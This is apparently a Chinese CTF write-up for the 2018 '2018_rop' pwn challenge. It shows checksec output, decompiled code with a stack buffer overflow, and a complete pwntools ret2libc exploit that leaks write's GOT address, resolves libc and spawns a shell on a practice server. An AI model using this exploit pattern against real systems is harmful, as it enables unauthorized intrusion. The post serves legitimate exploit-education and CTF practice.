本文详细介绍了如何利用2018年铁人三项比赛中的一个漏洞进行溢出攻击,首先分析了程序保护设置,然后通过IDA反汇编找到可利用的函数,接着编写EXP脚本,利用write函数泄露libc地址,最后成功getshell并获取flag。整个过程展示了在NX保护下,如何通过缓冲区溢出进行漏洞利用。
铁人三项(第五赛区)_2018_rop
潜心修炼,从基础开始
这是一道泄露libc,并getshell
解题流程
1.查看文件
$ file 2018_rop
2018_rop: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=a6c3ab368d8cd315e3bb2b970556ed0510bca094, not stripped
2.查看保护
$ checksec 2018_rop
[*] '/home/ctf/Downloads/pwnexercise/2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
开了NX,就是不允许写入shellcode
3.IDA反汇编
int __cdecl main(int argc, const char **argv, const char **envp)
{
be_nice_to_people();
vulnerable_function();
return write(1, "Hello, World\n", 0xDu);
}
main函数就是一个输出“Hello World!”,无异常看看其他
int be_nice_to_people()
{
__gid_t v1; // [esp+1Ch] [ebp-Ch]
v1 = getegid();
return setresgid(v1, v1, v1);
}
be_nice_to_people里面没有用户输入,跳过
ssize_t vulnerable_function()
{
char buf[136]; // [esp+10h] [ebp-88h] BYREF
return read(0, buf, 0x100u);
}
vulnerable_function函数里面从用户读入0x100个字符
查看buf缓冲区,只有0x88的长度,可以溢出
4.编写EXP
# -*- coding:utf-8 -*-
#! /usr/bin/env python
from pwn import *
from LibcSearcher import *
context(os="linux", arch="i386")
# context.log_level = "debug"
local = 0
elf = ELF('./2018_rop')
if local:
pro = process('./2018_rop')
else:
pro = remote('node4.buuoj.cn', 27508)
def get_libcbase():
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
# 泄露read的got地址
payload = b'a'*(0x88+4)
payload += p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
pro.sendline(payload)
write_addr = u32(pro.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr-libc.dump('write')
# print('libc_base_addr:%x'%libc_base)
return libc, libc_base
def get_shell(libc, libc_addr):
binsh = libc_addr+libc.dump('str_bin_sh')
system = libc_addr+libc.dump('system')
payload = b'a'*0x88+b'b'*0x4
payload += p32(system)+b'AAAA'+p32(binsh)
pro.sendline(payload)
pro.interactive()
if __name__ == '__main__':
libc, libc_addr = get_libcbase()
get_shell(libc, libc_addr)
因为第一次需要调用write函数泄露libc的地址,并计算偏移量,然后再进行getshell
5.获得flag
$ python3 2018_ropExp.py
[*] '/home/ctf/Downloads/pwnexercise/2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to node4.buuoj.cn on port 27508: Done
Multi Results:
0: archive-eglibc (id libc6_2.19-0ubuntu6_amd64)
1: archive-old-eglibc (id libc6_2.17-93ubuntu4_amd64)
2: http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6-i386_2.27-3ubuntu1_amd64.deb (id libc6-i386_2.27-3ubuntu1_amd64)
Please supply more info using
add_condition(leaked_func, leaked_address).
You can choose it by hand
Or type 'exit' to quit:2
[+] http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6-i386_2.27-3ubuntu1_amd64.deb (id libc6-i386_2.27-3ubuntu1_amd64) be choosed.
[*] Switching to interactive mode
$ cat flag
flag{d321f7a3-c8d3-442d-8394-07478c529711}
$
[*] Interrupted
[*] Closed connection to node4.buuoj.cn port 27508
打完收工
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
